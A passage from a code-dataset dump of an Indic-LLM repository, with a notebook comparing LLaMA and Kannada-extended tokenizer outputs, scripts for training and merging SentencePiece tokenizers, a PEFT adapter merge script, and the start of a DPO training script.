'▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAC>', 'ರ', '್', '▁', '1', '2', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', 
'<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>']\n",
"LLaMA tokenizer n_tokens=2789\n",
"Tokenized by kannada-LLaMA tokenizer:['<0x0A>', 'ರಸ', '್ತು', 'ತ', '▁ದಿನಗಳಲ್ಲಿ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ಫೋನ್', '\\u200c', 'ಗಳು', '▁ಮಾತ್ರವಲ್ಲ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳು', '▁ಕೂಡ', '▁ಸಿಕ್ಕ', 'ಾಪ', 'ಟ್ಟೆ', '▁ಸೌಂಡ್', '\\u200c', '▁ಮಾಡುತ್ತಿವೆ', '.', '▁ಫಿಟ್', 'ನೆ', 'ಸ್', '\\u200c', '▁ಆಧಾರಿತ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಟೆಕ್', '\\u200c', '▁ವಲಯದಲ್ಲಿ', '▁ಭಾರಿ', '▁ಬೇಡಿಕೆ', '▁ಇದೆ', '.', '▁ಇದೇ', '▁ಕಾರಣಕ್ಕೆ', '▁ಹಲವು', '▁ಕಂಪ', 'ೆ', 'ನಿ', 'ಗಳು', '▁ವೈ', 'ವಿಧ', '್ಯ', 'ಮಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ಪರಿ', 'ಚ', 'ಯಿ', 'ಸಿ', 'ವೆ', '.', '▁ಇವುಗಳಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕೂಡ', '▁ಬ', 'ಳ', 'ಕೆ', 'ದಾರರ', '▁ನೆ', 'ಚ್ಚಿ', 'ನ', '▁ಬ್ರಾಂಡ್', '\\u200c', '▁ಎ', 'ನಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಸದ್ಯ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ತನ್ನ', '▁ವಿ', 'ಭಿ', 'ನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಂದ', '▁ಗುರು', 'ತಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಇ', 'ದೀ', 'ಗ', '▁ತನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಭರ', '್', 'ಜ', 'ರಿ', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ಅನ್ನು', '▁ನೀಡುತ್ತಿದೆ', '.', '<0x0A>', 'ಹೌದು', ',', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕಂಪ', 'ೆ', 'ನಿ', '▁ತನ್ನ', '▁ಕೆಲವು', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಬಿಗ್', '\\u200c', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ನೀಡುತ್ತಿದೆ', '.', '▁ನೀವು', '▁ಕೂಡ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಖ', 'ರೀ', 'ದಿ', 'ಸಲು', '▁ಬ', 'ಯ', 'ಸಿ', 'ದರ', 'ೆ', '▁ಇದು', '▁ಉತ್', 'ತ', 'ಮ', '▁ಸಮಯ', 'ವಾಗಿದೆ', '.', '▁ಅದರಲ್ಲೂ', '▁ಜನಪ್ರಿಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಾದ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', ',', '▁ಬಿ', 'ಪ್', '▁ಯು', '▁ಪ್ರೊ', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', 'ಯು', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಘ', 'ೋ', 'ಷಿ', 'ಸಿ', 'ದೆ', '.', '▁ಹಾಗಾದ್ರೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಯಾವ', 'ೆಲ್ಲಾ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದೊರೆಯ', 'ುತ್ತಿದೆ', '▁ಅನ್ನ', 'ೊ', 'ದ', 'ನ್ನ', '▁ಈ', '▁ಲೇ', 'ಖ', 'ನ', 'ದಲ್ಲಿ', '▁ತಿಳಿಸಿಕೊಡ', '್ತೀವಿ', '▁ಓದಿ', 'ರಿ', '.', '<0x0A>', 'ಆ', 'ನ್', '\\u200c', 'ಲೈನ್', '\\u200c', '▁ಶಾಪಿಂಗ್', '\\u200c', '▁ದ', 'ೈ', 'ತ್ಯ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', '▁ಸೈಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಬ್ರಾಂಡ್', '▁ಡೇ', '▁ಸೇಲ್', '▁ಲೈವ್', '\\u200c', '▁ಆಗಿದೆ', '.', '▁ಅಲ್ಲದೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '▁ಫಿಟ್', '▁ನ', '▁ಅಧಿಕ', 'ೃ', 'ತ', '▁ವೆಬ್', '▁ಸೈಟ್', '▁ನಲ್ಲಿ', '▁ಕೂಡ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಸೇಲ್', '\\u200c', '▁ಲೈವ್', '▁ಆಗಿದೆ', '.', '▁ಈ', '▁ಸೇಲ್', '\\u200c', '▁ಇದೇ', '▁ಸೆ', 'ಪ್', 'ಟೆ', 'ಂಬರ್', '▁12', '▁ರವರೆಗೆ', '▁ನಡೆಯಲಿದೆ', '.', '▁ಇದರಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಮಾತ್ರ', '▁ಲಭ್ಯವಿದೆ', '.', '▁ಆದರೆ', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಪ್ರೊ', '▁ಫ್ಲ', 'ಿ', 'ಪ್', '\\u200c', 'ಕಾರ್', 'ಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಲಭ್ಯವಾಗಲಿದೆ', '.', '<0x0A>']\n",
"kannada LLaMA tokenizer n_tokens=398\n"
]
}
],
"source": [
"llama_tokenized = fast_llama_tokenizer.tokenize(text)\n",
"kannada_llama_tokenized = kannada_llama_tokenizer_hf.tokenize(text)\n",
"print(f\"Tokenized by LLaMA tokenizer:{llama_tokenized}\")\n",
"print(f\"LLaMA tokenizer n_tokens={len(llama_tokenized)}\")\n",
"print(f\"Tokenized by kannada-LLaMA tokenizer:{kannada_llama_tokenized}\")\n",
"print(f\"kannada LLaMA tokenizer n_tokens={len(kannada_llama_tokenized)}\")"
]
},
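  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "The same Kannada passage tokenizes to 2789 tokens with the base LLaMA tokenizer, which falls back to raw UTF-8 bytes such as `<0xE0>` for Kannada script, but only 398 tokens with the merged kannada-LLaMA tokenizer: roughly a 7x reduction in sequence length."
   ]
  },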
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"from datasets import load_dataset\n",
"\n",
"dataset = load_dataset.load(\"CognitiveLab/Project_K_TrainDataset_Small\")\n",
"dataset"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "training-venv",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.9.18"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 80,136 | Python | .py | 292 | 235.547945 | 26,239 | 0.398861 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,512 | train.py | adithya-s-k_Indic-llm/archives/tokenisation/train.py | import argparse
import os
import time
import sentencepiece as spm
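
# Trains a SentencePiece tokenizer on a raw text corpus and moves the
# resulting .model and .vocab files into the requested output directory.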
class SentencePieceTrainer:
def __init__(self):
        self.corpus_dir = "./corpus"  # default corpus location; not currently used by the CLI flow
self.output_dir = "./tokenizer_models"
self.model_prefix = "trained_sp_tokenizer"
self.vocab_size = 20000
self.character_coverage = 1.0
self.model_type = "unigram"
def train_sentencepiece_model(self, input_file):
start_time = time.time()
output_model_path = os.path.join(self.output_dir, f"{self.model_prefix}.model")
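        # SentencePiece writes {model_prefix}.model and {model_prefix}.vocab into
        # the current working directory; both files are moved into self.output_dir
        # once training finishes.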
spm.SentencePieceTrainer.train(
input=input_file,
model_prefix=self.model_prefix,
vocab_size=self.vocab_size,
character_coverage=self.character_coverage,
model_type=self.model_type,
train_extremely_large_corpus=True
)
os.rename(
f"{self.model_prefix}.vocab",
os.path.join(self.output_dir, f"{self.model_prefix}.vocab"),
)
os.rename(
f"{self.model_prefix}.model",
os.path.join(self.output_dir, f"{self.model_prefix}.model"),
)
end_time = time.time()
total_time_seconds = end_time - start_time
total_time_minutes = total_time_seconds / 60.0
print(f"Total time taken to train the model: {total_time_minutes:.2f} minutes")
return output_model_path
def run(self):
parser = argparse.ArgumentParser(description="Train a SentencePiece model.")
parser.add_argument(
"--input-file",
required=True,
help="Path to the input text corpus file.",
)
parser.add_argument(
"--output-dir",
default=self.output_dir,
help="Directory where the trained model and vocabulary will be saved.",
)
parser.add_argument(
"--model-prefix",
default=self.model_prefix,
help="Prefix for the model and vocabulary filenames.",
)
parser.add_argument(
"--vocab-size",
type=int,
default=self.vocab_size,
help="Size of the vocabulary.",
)
parser.add_argument(
"--character-coverage",
type=float,
default=self.character_coverage,
help="Character coverage for the model.",
)
parser.add_argument(
"--model-type",
default=self.model_type,
choices=["bpe", "unigram", "char", "word"],
help="Type of SentencePiece model.",
)
args = parser.parse_args()
self.output_dir = args.output_dir
self.model_prefix = args.model_prefix
self.vocab_size = args.vocab_size
self.character_coverage = args.character_coverage
self.model_type = args.model_type
os.makedirs(self.output_dir, exist_ok=True)
self.train_sentencepiece_model(args.input_file)
if __name__ == "__main__":
sp_trainer = SentencePieceTrainer()
sp_trainer.run()
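
# Example invocation (the corpus path below is a placeholder, not a file shipped with this repo):
#   python train.py --input-file ./corpus/kannada.txt --output-dir ./tokenizer_models \
#       --model-prefix kannada_sp --vocab-size 20000 --model-type unigram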
| 3,073 | Python | .py | 82 | 27.390244 | 87 | 0.590602 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,513 | merge_tokenizer.py | adithya-s-k_Indic-llm/archives/tokenisation/merge_tokenizer.py | # Based on https://github.com/ymcui/Chinese-LLaMA-Alpaca/blob/main/scripts/merge_tokenizer/merge_tokenizers.py
import os
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"] = "python"
import argparse
import sentencepiece as spm
from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model
from transformers import LlamaTokenizer
parser = argparse.ArgumentParser()
parser.add_argument("--llama_tokenizer_dir", default=None, type=str, required=True)
parser.add_argument("--kannada_sp_model_file", default="./kannada_sp.model", type=str)
args = parser.parse_args()
llama_tokenizer_dir = args.llama_tokenizer_dir
kannada_sp_model_file = args.kannada_sp_model_file
# load
llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir)
kannada_sp_model = spm.SentencePieceProcessor()
kannada_sp_model.Load(kannada_sp_model_file)
llama_spm = sp_pb2_model.ModelProto()
llama_spm.ParseFromString(llama_tokenizer.sp_model.serialized_model_proto())
kannada_spm = sp_pb2_model.ModelProto()
kannada_spm.ParseFromString(kannada_sp_model.serialized_model_proto())
# print number of tokens
print(len(llama_tokenizer), len(kannada_sp_model))
print(llama_tokenizer.all_special_tokens)
print(llama_tokenizer.all_special_ids)
print(llama_tokenizer.special_tokens_map)
## Add kannada tokens to LLaMA tokenizer
llama_spm_tokens_set = set(p.piece for p in llama_spm.pieces)
print(len(llama_spm_tokens_set))
print(f"Before:{len(llama_spm_tokens_set)}")
for p in kannada_spm.pieces:
piece = p.piece
if piece not in llama_spm_tokens_set:
new_p = sp_pb2_model.ModelProto().SentencePiece()
new_p.piece = piece
new_p.score = 0
llama_spm.pieces.append(new_p)
print(f"New model pieces: {len(llama_spm.pieces)}")
## Save
output_sp_dir = "merged_tokenizer_sp"
output_hf_dir = "merged_tokenizer_hf" # the path to save kannada-LLaMA tokenizer
os.makedirs(output_sp_dir, exist_ok=True)
with open(output_sp_dir + "/kannada_llama.model", "wb") as f:
f.write(llama_spm.SerializeToString())
tokenizer = LlamaTokenizer(vocab_file=output_sp_dir + "/kannada_llama.model")
tokenizer.save_pretrained(output_hf_dir)
print(f"kannada-LLaMA tokenizer has been saved to {output_hf_dir}")
# Test
llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir)
kannada_llama_tokenizer = LlamaTokenizer.from_pretrained(output_hf_dir)
print(tokenizer.all_special_tokens)
print(tokenizer.all_special_ids)
print(tokenizer.special_tokens_map)
text = """
ರಸ್ತುತ ದಿನಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ಫೋನ್ಗಳು ಮಾತ್ರವಲ್ಲ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳು ಕೂಡ ಸಿಕ್ಕಾಪಟ್ಟೆ ಸೌಂಡ್ ಮಾಡುತ್ತಿವೆ. ಫಿಟ್ನೆಸ್ ಆಧಾರಿತ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಗೆ ಟೆಕ್ ವಲಯದಲ್ಲಿ ಭಾರಿ ಬೇಡಿಕೆ ಇದೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ಹಲವು ಕಂಪೆನಿಗಳು ವೈವಿಧ್ಯಮಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ಪರಿಚಯಿಸಿವೆ. ಇವುಗಳಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಕೂಡ ಬಳಕೆದಾರರ ನೆಚ್ಚಿನ ಬ್ರಾಂಡ್ ಎನಿಸಿಕೊಂಡಿದೆ. ಸದ್ಯ ಅಮಾಜ್ಫಿಟ್ ತನ್ನ ವಿಭಿನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಂದ ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಇದೀಗ ತನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಭರ್ಜರಿ ಡಿಸ್ಕೌಂಟ್ ಅನ್ನು ನೀಡುತ್ತಿದೆ.
ಹೌದು, ಅಮಾಜ್ಫಿಟ್ ಕಂಪೆನಿ ತನ್ನ ಕೆಲವು ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಬಿಗ್ ಡಿಸ್ಕೌಂಟ್ ನೀಡುತ್ತಿದೆ. ನೀವು ಕೂಡ ಅಮಾಜ್ಫಿಟ್ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಖರೀದಿಸಲು ಬಯಸಿದರೆ ಇದು ಉತ್ತಮ ಸಮಯವಾಗಿದೆ. ಅದರಲ್ಲೂ ಜನಪ್ರಿಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಾದ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ, ಬಿಪ್ ಯು ಪ್ರೊ ಮತ್ತು ಬಿಪ್ಯು ವಾಚ್ಗಳಿಗೆ ರಿಯಾಯಿತಿ ಘೋಷಿಸಿದೆ. ಹಾಗಾದ್ರೆ ಅಮಾಜ್ಫಿಟ್ ವಾಚ್ಗಳಿಗೆ ಯಾವೆಲ್ಲಾ ರಿಯಾಯಿತಿ ದೊರೆಯುತ್ತಿದೆ ಅನ್ನೊದನ್ನ ಈ ಲೇಖನದಲ್ಲಿ ತಿಳಿಸಿಕೊಡ್ತೀವಿ ಓದಿರಿ.
ಆನ್ಲೈನ್ ಶಾಪಿಂಗ್ ದೈತ್ಯ ಅಮೆಜಾನ್ ಸೈಟ್ನಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಬ್ರಾಂಡ್ ಡೇ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಅಲ್ಲದೆ ಅಮಾಜ್ ಫಿಟ್ ನ ಅಧಿಕೃತ ವೆಬ್ ಸೈಟ್ ನಲ್ಲಿ ಕೂಡ ರಿಯಾಯಿತಿ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಈ ಸೇಲ್ ಇದೇ ಸೆಪ್ಟೆಂಬರ್ 12 ರವರೆಗೆ ನಡೆಯಲಿದೆ. ಇದರಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ ಅಮೆಜಾನ್ನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿದೆ. ಆದರೆ ಬಿಪ್ ಯು ಮತ್ತು ಬಿಪ್ ಯು ಪ್ರೊ ಫ್ಲಿಪ್ಕಾರ್ಟ್ನಲ್ಲಿ ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಲಭ್ಯವಾಗಲಿದೆ.
"""
print("Test text:\n", text)
llama_tokenized = llama_tokenizer.tokenize(text)
kannada_llama_tokenized = kannada_llama_tokenizer.tokenize(text)
print(f"Tokenized by LLaMA tokenizer:{llama_tokenized}")
print(f"LLaMA tokenizer n_tokens={len(llama_tokenized)}")
print(f"Tokenized by kannada-LLaMA tokenizer:{kannada_llama_tokenized}")
print(f"kannada LLaMA tokenizer n_tokens={len(kannada_llama_tokenized)}")
| 6,152 | Python | .py | 65 | 60.907692 | 438 | 0.691731 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,514 | merge_adapter.py | adithya-s-k_Indic-llm/archives/dpo/merge_adapter.py | from dataclasses import dataclass, field
from typing import Optional
import torch
from peft import PeftConfig, PeftModel
from transformers import AutoModelForCausalLM, AutoModelForSequenceClassification, AutoTokenizer, HfArgumentParser, LlamaForCausalLM, LlamaTokenizer
@dataclass
class ScriptArguments:
"""
    Names of the PEFT adapter, the base model it was fine-tuned from, and the
    tokenizer to pair with it, plus the output name for the merged model.
"""
adapter_model_name: Optional[str] = field(default=None, metadata={"help": "the adapter name"})
base_model_name: Optional[str] = field(default=None, metadata={"help": "the base model name"})
base_tokenizer_name: Optional[str] = field(default=None, metadata={"help": "the tokeniser model name"})
output_name: Optional[str] = field(default=None, metadata={"help": "the merged model name"})
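
# Example invocation (all four names are placeholders):
#   python merge_adapter.py --base_model_name <base-model> --base_tokenizer_name <tokenizer> \
#       --adapter_model_name <lora-adapter> --output_name ./merged-model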
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
assert script_args.adapter_model_name is not None, "please provide the name of the Adapter you would like to merge"
assert script_args.base_model_name is not None, "please provide the name of the Base model"
assert script_args.base_tokenizer_name is not None, "please provide the name of the tokenizer model"
assert script_args.output_name is not None, "please provide the output name of the merged model"
peft_config = PeftConfig.from_pretrained(script_args.adapter_model_name)
# if peft_config.task_type == "SEQ_CLS":
# # The sequence classification task is used for the reward model in PPO
# model = AutoModelForSequenceClassification.from_pretrained(
# script_args.base_model_name, num_labels=1, torch_dtype=torch.bfloat16
# )
# else:
model = LlamaForCausalLM.from_pretrained(
script_args.base_model_name, return_dict=True, torch_dtype=torch.bfloat16
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.base_tokenizer_name)  # load the tokenizer that was passed in, not the base model path
print("Loading PEFT")
# Load the PEFT model
model = PeftModel.from_pretrained(model, script_args.adapter_model_name)
model.eval()
print("Started Merging")
model = model.merge_and_unload()
print("Saving the Model")
model.save_pretrained(f"{script_args.output_name}")
tokenizer.save_pretrained(f"{script_args.output_name}")
print("Saving complete complete")
# model.push_to_hub(f"{script_args.output_name}", use_temp_dir=False)
 | 2,346 | Python | .py | 43 | 52.488372 | 148 | 0.779765 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,515 | dpo.py | adithya-s-k_Indic-llm/archives/dpo/dpo.py | # 0. imports
import os
from dataclasses import dataclass, field
from typing import Dict, Optional
import torch
from datasets import Dataset, load_dataset
from peft import LoraConfig
from transformers import AutoModelForCausalLM, AutoTokenizer, HfArgumentParser, TrainingArguments, LlamaTokenizer ,LlamaForCausalLM
from trl import DPOTrainer
# Define and parse arguments.
@dataclass
class ScriptArguments:
"""
The arguments for the DPO training script.
"""
# data parameters
beta: Optional[float] = field(default=0.1, metadata={"help": "the beta parameter for DPO loss"})
# training parameters
model_name_or_path: Optional[str] = field(
default="../sft/results/final_checkpoint",
metadata={"help": "the location of the SFT model name or path"},
)
    tokenizer_name_or_path: Optional[str] = field(
default="Cognitive-Lab/Ambari-7B-Instruct-v0.1",
metadata={"help": "the name of the tokenizer"},
)
learning_rate: Optional[float] = field(default=5e-4, metadata={"help": "optimizer learning rate"})
lr_scheduler_type: Optional[str] = field(default="cosine", metadata={"help": "the lr scheduler type"})
warmup_steps: Optional[int] = field(default=100, metadata={"help": "the number of warmup steps"})
weight_decay: Optional[float] = field(default=0.05, metadata={"help": "the weight decay"})
